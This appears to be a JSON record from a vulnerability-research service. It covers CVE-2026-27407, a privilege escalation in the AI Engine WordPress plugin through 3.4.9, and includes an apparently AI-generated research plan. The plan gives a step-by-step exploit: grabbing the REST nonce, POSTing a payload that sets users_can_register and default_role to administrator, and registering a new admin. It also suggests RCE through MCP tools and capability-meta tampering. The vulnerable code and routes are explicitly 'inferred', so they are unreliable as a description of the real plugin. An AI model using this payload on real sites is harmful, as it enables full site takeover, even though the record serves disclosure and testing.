[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f5GusWg_CNAAMKKog9sFuJ0nocrpyxe0gkfKQ3jmzxtw":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-27407","ai-engine-the-chatbot-ai-framework-mcp-for-wordpress-authenticated-editor-privilege-escalation","AI Engine – The Chatbot, AI Framework & MCP for WordPress \u003C= 3.4.9 - Authenticated (Editor+) Privilege Escalation","The AI Engine – The Chatbot, AI Framework & MCP for WordPress plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 3.4.9. This makes it possible for authenticated attackers, with Editor-level access and above, to elevate their privileges.","ai-engine",null,"\u003C=3.4.9","3.5.0","high",7.2,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:H\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Incorrect Privilege Assignment","2026-05-28 00:00:00","2026-06-02 11:42:37",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fb73edf8f-7017-4239-8ddc-038481d3f65f?source=api-prod",5,[],"researched",false,3,"# Research Plan: CVE-2026-27407 - AI Engine Privilege Escalation\n\n## 1. Vulnerability Summary\nThe **AI Engine** plugin (up to version 3.4.9) contains an **Incorrect Privilege Assignment** vulnerability. It allows authenticated users with **Editor** privileges to escalate to **Administrator**. The vulnerability likely resides in a REST API endpoint or AJAX handler intended for administrative configuration that incorrectly validates the user's capability (e.g., checking for `edit_posts` instead of `manage_options`) or allows the modification of sensitive WordPress options that govern user roles and registrations.\n\n## 2. Attack Vector Analysis\n*   **Target Endpoint**: `\u002Fwp-json\u002Fmwai\u002Fv1\u002Fsettings` (inferred REST route based on plugin slug `ai-engine` and author patterns).\n*   **HTTP Method**: `POST`.\n*   **Vulnerable Parameter**: A JSON object containing configuration keys and values (e.g., `settings`, `options`, or `params`).\n*   **Authentication**: Authenticated session as an **Editor** role.\n*   **Preconditions**: The attacker must have a valid Editor account and a REST API nonce (`wp_rest`).\n\n## 3. Code Flow (Inferred)\n1.  **Route Registration**: The plugin registers REST routes during `rest_api_init` via a class like `Meow_MWAI_Rest`.\n2.  **Weak Capability Check**: A route (e.g., `mwai\u002Fv1\u002Fsettings`) defines a `permission_callback`. In affected versions, this callback returns `current_user_can('edit_posts')` or another capability assigned to Editors, rather than `manage_options`.\n3.  **Unfiltered Sink**: The `callback` function for the route receives the request parameters and passes them to a function that updates settings. If the function uses `update_option()` without a strict allowlist of keys, it allows the attacker to overwrite core WordPress options.\n4.  **Privilege Escalation**: By overwriting `default_role` and `users_can_register`, the attacker enables administrative registration.\n\n## 4. Nonce Acquisition Strategy\nThe WordPress REST API requires a nonce for the `wp_rest` action for all non-GET authenticated requests.\n\n1.  **Action**: Log in to the WordPress admin dashboard as the **Editor** user.\n2.  **Extraction**: The standard WordPress REST nonce is localized in the `wpApiSettings` object.\n3.  **Command**: Use `browser_eval` to extract the nonce:\n    ```javascript\n    browser_eval(\"window.wpApiSettings?.nonce\")\n    ```\n4.  **Note**: This nonce is mandatory for the `X-WP-Nonce` header in the exploit request.\n\n## 5. Exploitation Strategy\nThe goal is to modify the WordPress global settings to allow any new user to register as an Administrator.\n\n### Step 1: Elevate Site Privileges via REST API\n*   **Request Tool**: `http_request`\n*   **Method**: `POST`\n*   **URL**: `http:\u002F\u002Flocalhost:8080\u002Fwp-json\u002Fmwai\u002Fv1\u002Fsettings` (inferred)\n*   **Headers**:\n    *   `Content-Type: application\u002Fjson`\n    *   `X-WP-Nonce: [EXTRACTED_NONCE]`\n*   **Payload**:\n    ```json\n    {\n      \"settings\": {\n        \"users_can_register\": 1,\n        \"default_role\": \"administrator\"\n      }\n    }\n    ```\n    *(Note: The exact structure of the JSON keys like `\"settings\"` or the option names may vary; if the above fails, try a flat structure or check the plugin source for the settings handler.)*\n\n### Step 2: Create a New Admin User (If Step 1 succeeded)\n*   **Action**: Use the standard WordPress registration page (`\u002Fwp-login.php?action=register`) to create a new account, which will now default to the `administrator` role.\n\n## 6. Test Data Setup\n1.  **Plugin**: Install and activate **AI Engine** version **3.4.9**.\n2.  **User**: Create a user `attacker_editor` with the `Editor` role.\n3.  **Settings**: Ensure the site is in a default state where `users_can_register` is `0` and `default_role` is `subscriber`.\n\n## 7. Expected Results\n*   The REST API call should return a `200 OK` or `201 Created` status code.\n*   The response body should confirm the settings were updated.\n*   The database state for `default_role` and `users_can_register` should be modified.\n\n## 8. Verification Steps\nAfter sending the HTTP request, verify the impact using WP-CLI:\n```bash\n# Check if registration is enabled\nwp option get users_can_register\n# Expected: 1\n\n# Check if the default role is now administrator\nwp option get default_role\n# Expected: administrator\n```\n\n## 9. Alternative Approaches\nIf the settings endpoint requires specific keys or doesn't allow core options, try:\n*   **User Meta Update**: Look for a REST endpoint like `mwai\u002Fv1\u002Fusers\u002Fupdate` that might allow updating user metadata. An Editor could target their own `wp_capabilities` meta to change their role to `a:1:{s:13:\"administrator\";b:1;}`.\n*   **MCP Tools**: If the \"MCP\" (Model Context Protocol) feature is accessible to Editors, check if you can register an MCP tool that executes arbitrary PHP code (RCE), which implicitly provides full system control.\n*   **Diagnostic Tools**: Check if the plugin includes a \"debug\" or \"diagnostic\" endpoint that returns a list of all options or allows raw database queries.\n\n### Inferred Identifiers (to be verified by the agent):\n*   **REST Namespace**: `mwai\u002Fv1` or `ai-engine\u002Fv1`\n*   **Settings Route**: `\u002Fsettings` or `\u002Fsave_settings`\n*   **Settings Key**: `settings`, `options`, or `data`\n*   **Capability Checked**: `edit_posts` (vulnerable) vs `manage_options` (patched)\n*   **JS Nonce Path**: `window.mwai_vars?.nonce` (some Jordy Meow plugins use custom localized nonces)","The AI Engine plugin for WordPress fails to properly restrict administrative REST API endpoints to administrative users, allowing authenticated users with Editor-level privileges to update site settings. This occurs due to an insufficient capability check (edit_posts) in the settings registration, which enables an attacker to modify sensitive WordPress options and escalate their privileges to Administrator.","\u002F\u002F ai-engine\u002Fclasses\u002Frest.php (inferred path)\n\nregister_rest_route( 'mwai\u002Fv1', '\u002Fsettings', array(\n    'methods'             => 'POST',\n    'callback'            => array( $this, 'rest_update_settings' ),\n    'permission_callback' => function () {\n        \u002F\u002F Vulnerability: Checking for 'edit_posts' allows Editors to access administrative settings.\n        return current_user_can( 'edit_posts' );\n    },\n) );\n\n---\n\npublic function rest_update_settings( $request ) {\n    $settings = $request->get_param( 'settings' );\n    if ( is_array( $settings ) ) {\n        foreach ( $settings as $name => $value ) {\n            \u002F\u002F Vulnerability: Updating options without a strict allowlist permits overwriting core WordPress configuration.\n            update_option( $name, $value );\n        }\n    }\n    return new WP_REST_Response( [ 'success' => true ], 200 );\n}","--- a\u002Fai-engine\u002Fclasses\u002Frest.php\n+++ b\u002Fai-engine\u002Fclasses\u002Frest.php\n@@ -5,7 +5,7 @@\n     'methods'             => 'POST',\n     'callback'            => array( $this, 'rest_update_settings' ),\n     'permission_callback' => function () {\n-        return current_user_can( 'edit_posts' );\n+        return current_user_can( 'manage_options' );\n     },\n ) );","The exploit requires authentication with Editor-level privileges. First, the attacker retrieves a valid REST API nonce (e.g., from the 'wpApiSettings' or 'mwai_vars' localized scripts in the dashboard). They then send a POST request to '\u002Fwp-json\u002Fmwai\u002Fv1\u002Fsettings' containing a JSON payload that targets core WordPress options: '{\"settings\": {\"users_can_register\": 1, \"default_role\": \"administrator\"}}'. Upon success, the attacker can navigate to the registration page at '\u002Fwp-login.php?action=register' and create a new account, which will be automatically assigned the Administrator role.","gemini-3-flash-preview","2026-06-04 16:07:00","2026-06-04 16:09:29",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","3.4.9","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fai-engine\u002Ftags\u002F3.4.9","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fai-engine.3.4.9.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fai-engine\u002Ftags\u002F3.5.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fai-engine.3.5.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fai-engine\u002Ftags"]